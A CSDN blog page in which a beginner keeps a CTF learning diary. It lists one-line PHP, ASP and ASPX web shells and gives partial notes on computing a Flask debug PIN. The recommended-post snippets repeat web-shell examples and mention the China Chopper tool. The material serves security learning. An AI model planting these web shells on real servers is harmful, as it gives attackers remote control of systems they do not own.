【考核】CTF小白入门中

最新推荐文章于 2024-09-27 15:39:55 发布

wlgbcskzxc679

最新推荐文章于 2024-09-27 15:39:55 发布

阅读量97

点赞数

文章标签： android java 开发语言

本文链接：https://blog.csdn.net/wlgbcskzxc679/article/details/133963489

版权

今日学到的新知识：

1.一句话木马的形式：php <?php@eval($_POST["pass"]);?>

一句话木马 asp <%eval request("pass")%>

aspx <%@ Page language="Jscript"%>

今天写了ErrorFlask的题目

启动靶机可以看到他要求我们上传number1和number2，在URL上打入即可看到下一个页面

在尝试中将number2=2改为number2=[class]得到(在这一步中发现输入不同编码会出现不同的异常报错python常见异常

一般出现这个界面会要求计算pin，查询得知计算pin的步骤分为五步

1.在报错页面找到绝对路径(emmm卡住了找不到TT-TT，每天起床再研究研究，今天就先这样吧

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

wlgbcskzxc679

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

CTF从入门到提升（一）.docx

12-18

CTF从入门到提升（一） CTF（Capture The Flag）是一种网络安全竞赛的形式，起源于西方传统运动，两军互相争夺旗帜，夺取敌军旗帜代表战败。在信息安全领域，CTF是通过各种攻击手法，获取服务器后寻找指定的字段，...

CTF 竞赛入门指南（ctf-all-in-one）.pdf

09-07

一、基础篇；二、工具篇；三、分类专题篇；四、技巧篇；五、高级篇；六、题解篇；七、实战篇... 2000多页的电子书，讲解细致，值得搜藏。

1 条评论您还未登录，请先登录后发表或查看评论

*CTF-2022 WEB

qq_53263789的博客

04-24

928

oh-my-notepro python3.8 pin码计算发现sql注入，可以堆叠注入生成要素 username，通过getpass.getuser()读取，通过文件读取/etc/passwd modname，通过getattr(mod,“file”,None)读取，默认值为flask.app appname，通过getattr(app,“name”,type(app).name)读取，默认值为Flask moddir, 在flask库下app..

CTFweb篇-一句话木马

weixin_44597701的博客

08-05

5625

什么是一句话木马一句话木马就是将一段代码植入服务器中，然后通过蚁剑就可以直接拿到webshell 最简单的一句话木马: <?php @eval($_POST['attack']) ?> 通常这句话就能让密码为attack，至于为什么，这需要祥看蚁剑的原理为了防止D盾的阻拦，经常可以使用不同的混淆来绕开D盾一句话木马的条件（1）木马上传成功，未被杀；（2）知道木马的路径在哪；（3）上传的木马能正常运行。例题先用御剑扫描一下发现后台地址然后进入输入root 密码空(至于为什

CTF竞赛实战中国菜刀与一句话木马

热门推荐

keep coding

05-05

7万+

中国菜刀下载地址: http://pan.baidu.com/share/link?shareid=871753024&uk=388464620一.基本操作:往目标网站中加入一句话木马，然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录二.实战asp的一句话是：<%eval request ("pass")%>aspx的一句话是：<%@ P...

CTF----Web真零基础入门

B_cecretary的博客

01-17

2万+

前置知识： TCP/IP体系结构（IP和端口）： IP是什么：是计算机在互联网上的唯一标识（坐标，代号），用于在互联网中寻找计算机。访问网站时：域名会通过DNS（解析服务）解析成IP。所以，互通的前提条件就是双方都能找到对方的IP地址。内网（局域网）IP和公网（互联网）IP：内网IP：路由以内的网络，可以连接互联网，但是互联网无法直接连接内网（需要端口映射）如何判断自己的电脑是内网还是公网： --在本地电脑命令行输入jipconfig，ifconfig（Linux，macos）查看

关于ctf中flask算pin总结

arcuied

02-20

5238

flask pin的相关问题

ctfshow 常用姿势

qq_53063436的博客

11-02

966

ctfshow 常用姿态

【考核】ctf小白入门中.......

wlgbcskzxc679的博客

10-23

638

下一步是用bp抓包，还没下这个......看看新电脑明天能不能到，能的话明天下到那个电脑里，今天就先到这里了，晚安。第一关要求用GET给ctf传参，在URL后输入get的格式，这里我是随便输入的数值 /？到了第二关，这里要求找到secret，这里直接查找网页源代码就能找到secret的值。得进行base64解码，得到n3wst4rCTF2023g00000d。（讲的蛮细的，不过没有实操，看的懵懵懂懂，码住先。1.GET传参格式：/?今天写Begin of HTTP。2.POST传参格式。

CTF小白短期计划

wlgbcskzxc679的博客

10-18

今天初步接触了web的题目，只能说是一头雾水。目前计划今天白天看点点入门视频打打基础再开始刷题。直接上来就刷题实在是有点招架不住，第二题就做不出来了。今晚就先写到这，明天继续更新学习进度与跟为详细的学习计划。现在是10.18午夜，社团考核在11.4日，预计还有17天准备时间。

网络安全 CTF 入门.pdf

07-09

网络安全 CTF 入门

CTF-入门练习题

10-30

网络攻防是CTF中的核心部分，涉及攻击者与防御者的对抗。攻击者可能试图寻找系统漏洞，进行SQL注入、XSS跨站脚本攻击、命令注入等；而防御者则要强化系统安全性，防止这些攻击。通过练习，参与者可以了解网络攻防的...

【转】CTF-All-In-One（CTF从入门到放弃）pdf

03-20

CTF-All-In-One（CTF 从入门到放弃） ——“与其相信谣言，不如一直学习。”

windows10使用bat脚本安装前后端环境之msyql5.7安装配置并重置用户密码

最新发布

风吹淡了悲伤

09-27

315

mysql-user-init.sql：重置root密码（并新增zhangsan用户授予权限）adserver-simple.sql：创建数据库sql脚本。5.启动并修改root密码（新增用户初始化授予权限）2.新增data文件夹与my.ini配置文件。1.下载mysql5.7 zip格式安装包。4.安装mysql windows服务。

Android Camera 预览角度和拍照保存图片角度相关

sinat_37429535的博客

09-23

1164

基于Android R(11)

Android 已经过时的方法用什么新方法替代?

赵星海的博客

09-25

304

【代码】Android 已经过时的方法用什么新方法替代?

从android-webview播放video标签黑屏谈起

yeshen.org

09-27

200

webview video 黑屏

android system_server进程

轻口味的专栏

09-23

946

system_server进程是系统进程，java framework框架的核心载体，里面运行了大量的系统服务，比如这里提供ApplicationThreadProxy（简称ATP），ActivityManagerService（简称AMS），这个两个服务都运行在system_server进程的不同线程中，由于ATP和AMS都是基于IBinder接口，都是binder线程，binder线程的创建与销毁都是由binder驱动来决定的。系统为什么不允许在子线程中访问UI？

中文ctf入门学习网站

05-22

以下是一些中文CTF入门学习网站： 1. CTF365：https://ctf365.com/ 2. CTFHub：https://www.ctfhub.com/ 3. HackThisSite：https://www.hackthissite.org/ 4. Root-Me：https://www.root-me.org/ 5. Hacking-Lab：...